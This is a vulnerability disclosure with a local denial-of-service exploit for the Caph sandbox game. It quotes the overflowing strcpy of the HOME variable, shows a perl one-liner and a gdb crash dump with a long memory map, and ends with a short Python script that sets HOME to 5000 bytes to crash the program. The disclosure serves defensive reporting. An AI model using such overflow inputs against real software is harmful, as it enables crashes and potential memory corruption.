# Caph DOS Exploit by N_A . Crashes the program and produces a segmentation fault # Tested upon Kali Linux. # Discovered by N_A , N_A [at] tutanota.com # Description # ============ # It is a sandbox game, based on physics. The game aim is to make contact red object with green object. # You can use various objects, solid, wire (rope), and bendable objects. Gravitation will help you. # https://sourceforge.net/projects/caphgame # Vulnerability # ============== # Caph suffers from a buffer over flow vulnerability that crashes the program. The 'HOME' environment # variable can be abused to produce an over flow.A The subsequent details are below: # in file caph.c # static const char * # sys_get_config() # { #A A A A A A A static char dir[256]; #A A A A A A A const char *home; # #if defined(_WIN32) #A A A A A A A strcpy(dir, DATA_CONFIG); #A A A A A A A return dir; # #else #A A A A A A A home = getenv("HOME"); # #A A A A A A A if (home) #A A A A A A A A A A A A A A A strcpy(dir, home); # The sys_get_config() function is called again in main() and an overflow can be produced , as per below: # NA@kali:~/caph-1.1/src$ export HOME=`perl -e 'print"A"x5000'` # NA@kali:/home/NAcaph-1.1/src$ ./caph # Segmentation fault # gdb caph # GNU gdb (Debian 7.11.1-2) 7.11.1 # Copyright (C) 2016 Free Software Foundation, Inc. # License GPLv3+: GNU GPL version 3 or later # This is free software: you are free to change and redistribute it. # There is NO WARRANTY, to the extent permitted by law.A Type "show copying" # and "show warranty" for details. # This GDB was configured as "i686-linux-gnu". # Type "show configuration" for configuration details. # For bug reporting instructions, please see: # . # Find the GDB manual and other documentation resources online at: # . # For help, type "help". # Type "apropos word" to search for commands related to "word"... # Reading symbols from caph...done. # (gdb) r # Starting program: /home/NA/caph-1.1/src/caph # [Thread debugging using libthread_db enabled] # Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". # *** Error in `/home/NA/caph-1.1/src/caph': free(): invalid next size (normal): 0x08053028 *** # ======= Backtrace: ========= # /lib/i386-linux-gnu/libc.so.6(+0x66677)[0xb7cc8677] # /lib/i386-linux-gnu/libc.so.6(+0x6c627)[0xb7cce627] # /lib/i386-linux-gnu/libc.so.6(+0x6cdd1)[0xb7ccedd1] # /lib/i386-linux-gnu/libc.so.6(+0x5d7cd)[0xb7cbf7cd] # /lib/i386-linux-gnu/libc.so.6(fopen+0x1e)[0xb7cbf7fe] # /home/Nassar/newtest/caph-1.1/src/caph(main+0x196)[0x8049656] # /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb7c7a5f7] # /home/NA/caph-1.1/src/caph[0x804a6c4] # ======= Memory map: ======== # 08048000-08052000 r-xp 00000000 08:05 1709919A A A /home/NA/caph-1.1/src/caph # 08052000-08053000 rw-p 00009000 08:05 1709919A A A /home/NA/caph-1.1/src/caph # 08053000-08074000 rw-p 00000000 00:00 0A A A A A A A A A [heap] # b6f00000-b6f21000 rw-p 00000000 00:00 0 # b6f21000-b7000000 ---p 00000000 00:00 0 # b704b000-b704f000 rw-p 00000000 00:00 0 # b704f000-b707a000 r-xp 00000000 08:05 1708986A A A /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8 # b707a000-b707b000 r--p 0002a000 08:05 1708986A A A /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8 # b707b000-b707c000 rw-p 0002b000 08:05 1708986A A A /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8 # b707c000-b7083000 r-xp 00000000 08:05 1708466A A A /usr/lib/i386-linux-gnu/libogg.so.0.8.2 # b7083000-b7084000 r--p 00006000 08:05 1708466A A A /usr/lib/i386-linux-gnu/libogg.so.0.8.2 # b7084000-b7085000 rw-p 00007000 08:05 1708466A A A /usr/lib/i386-linux-gnu/libogg.so.0.8.2 # b7085000-b7086000 rw-p 00000000 00:00 0 # b7086000-b709a000 r-xp 00000000 08:05 263412A A A A /lib/i386-linux-gnu/libgpg-error.so.0.17.0 # b709a000-b709b000 r--p 00013000 08:05 263412A A A A /lib/i386-linux-gnu/libgpg-error.so.0.17.0 # b709b000-b709c000 rw-p 00014000 08:05 263412A A A A /lib/i386-linux-gnu/libgpg-error.so.0.17.0 # b709c000-b7113000 r-xp 00000000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7113000-b7114000 r--p 00076000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7114000-b7115000 rw-p 00077000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7115000-b7129000 r-xp 00000000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b7129000-b712a000 r--p 00013000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b712a000-b712b000 rw-p 00014000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b712b000-b712d000 rw-p 00000000 00:00 0 # b712d000-b71a7000 r-xp 00000000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71a7000-b71b8000 r--p 00079000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71b8000-b71b9000 rw-p 0008a000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71b9000-b7218000 r-xp 00000000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b7218000-b7219000 r--p 0005e000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b7219000-b721a000 rw-p 0005f000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b721a000-b721b000 rw-p 00000000 00:00 0 # b721b000-b7231000 r-xp 00000000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7231000-b7232000 ---p 00016000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7232000-b7233000 r--p 00016000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7233000-b7234000 rw-p 00017000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7234000-b7236000 rw-p 00000000 00:00 0 # b7236000-b7252000 r-xp 00000000 08:05 263406A A A A /lib/i386-linux-gnu/libgcc_s.so.1 # b7252000-b7253000 rw-p 0001b000 08:05 263406A A A A /lib/i386-linux-gnu/libgcc_s.so.1 # b7253000-b731c000 r-xp 00000000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731c000-b731d000 ---p 000c9000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731d000-b731e000 r--p 000c9000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731e000-b7321000 rw-p 000ca000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b7321000-b734b000 r-xp 00000000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734b000-b734c000 r--p 00029000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734c000-b734d000 rw-p 0002a000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734d000-b7370000 r-xp 00000000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7370000-b7371000 r--p 00022000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7371000-b7372000 rw-p 00023000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7372000-b7374000 rw-p 00000000 00:00 0 # b7374000-b7385000 r-xp 00000000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7385000-b7386000 r--p 00010000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7386000-b7387000 rw-p 00011000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7387000-b738b000 r-xp 00000000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738b000-b738c000 r--p 00003000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738c000-b738d000 rw-p 00004000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738d000-b7392000 r-xp 00000000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7392000-b7393000 r--p 00004000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7393000-b7394000 rw-p 00005000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7394000-b7406000 r-xp 00000000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7406000-b7407000 ---p 00072000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7407000-b7408000 r--p 00072000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7408000-b7409000 rw-p 00073000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7409000-b740d000 rw-p 00000000 00:00 0 # b740d000-b7415000 r-xp 00000000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7415000-b7416000 r--p 00007000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7416000-b7417000 rw-p 00008000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7417000-b7418000 rw-p 00000000 00:00 0 # b7418000-b74a0000 r-xp 00000000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a0000-b74a1000 ---p 00088000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a1000-b74a3000 r--p 00088000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a3000-b74a4000 rw-p 0008a000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a4000-b74aa000 r-xp 00000000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74aa000-b74ab000 r--p 00005000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74ab000-b74ac000 rw-p 00006000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74ac000-b74b4000 r-xp 00000000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b4000-b74b5000 r--p 00007000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b5000-b74b6000 rw-p 00008000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b6000-b74cf000 r-xp 00000000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74cf000-b74d0000 r--p 00018000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74d0000-b74d1000 rw-p 00019000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74d1000-b74d3000 rw-p 00000000 00:00 0 # b74d3000-b74d8000 r-xp 00000000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74d8000-b74d9000 r--p 00004000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74d9000-b74da000 rw-p 00005000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74da000-b74db000 rw-p 00000000 00:00 0 # b74db000-b74dd000 r-xp 00000000 08:05 1707393A A A /usr/lib/i386-linux-gnu/libXau.so.6.0.0 # b74dd000-b74de000 r--p 00001000 08:05 1707393A A A /usr/lib/i386-linux-gnu/libXau.so.6.0.0 # b74de000-b74df000 rw-p 00002000 08:05 1707393A A A /usr/lib/i386-linux-gnu/libXau.so.6.0.0 # b74df000-b74ff000 r-xp 00000000 08:05 277202A A A A /lib/i386-linux-gnu/libtinfo.so.5.9 # b74ff000-b7501000 r--p 0001f000 08:05 277202A A A A /lib/i386-linux-gnu/libtinfo.so.5.9 # b7501000-b7502000 rw-p 00021000 08:05 277202A A A A /lib/i386-linux-gnu/libtinfo.so.5.9 # b7502000-b7535000 r-xp 00000000 08:05 263441A A A A /lib/i386-linux-gnu/libncursesw.so.5.9 # b7535000-b7536000 r--p 00032000 08:05 263441A A A A /lib/i386-linux-gnu/libncursesw.so.5.9 # b7536000-b7537000 rw-p 00033000 08:05 263441A A A A /lib/i386-linux-gnu/libncursesw.so.5.9 # b7537000-b7628000 r-xp 00000000 08:05 263430A A A A /lib/i386-linux-gnu/libslang.so.2.3.0 # b7628000-b762b000 r--p 000f0000 08:05 263430A A A A /lib/i386-linux-gnu/libslang.so.2.3.0 # b762b000-b763a000 rw-p 000f3000 08:05 263430A A A A /lib/i386-linux-gnu/libslang.so.2.3.0 # b763a000-b7669000 rw-p 00000000 00:00 0 # b7669000-b76c2000 r-xp 00000000 08:05 263384A A A A /lib/i386-linux-gnu/libdbus-1.so.3.14.6 # b76c2000-b76c3000 r--p 00058000 08:05 263384A A A A /lib/i386-linux-gnu/libdbus-1.so.3.14.6 # b76c3000-b76c4000 rw-p 00059000 08:05 263384A A A A /lib/i386-linux-gnu/libdbus-1.so.3.14.6 # ..... # ..... # ..... # Program received signal SIGABRT, Aborted. # 0xb7fdac38 in __kernel_vsyscall () # (gdb) import os def banner(): A A A print('==========================') A A A print('Local Caph DOS Exploit') A A A print() A A A print('\tby N_A') A A A print('==========================') A A A print() banner() buffer = "\x41" * 5000 os.environ['HOME'] = str(buffer) os.system('./caph') #make sure the exploit is in the same directory as caph -- Securely sent with Tutanota. Claim your encrypted mailbox today! https://tutanota.com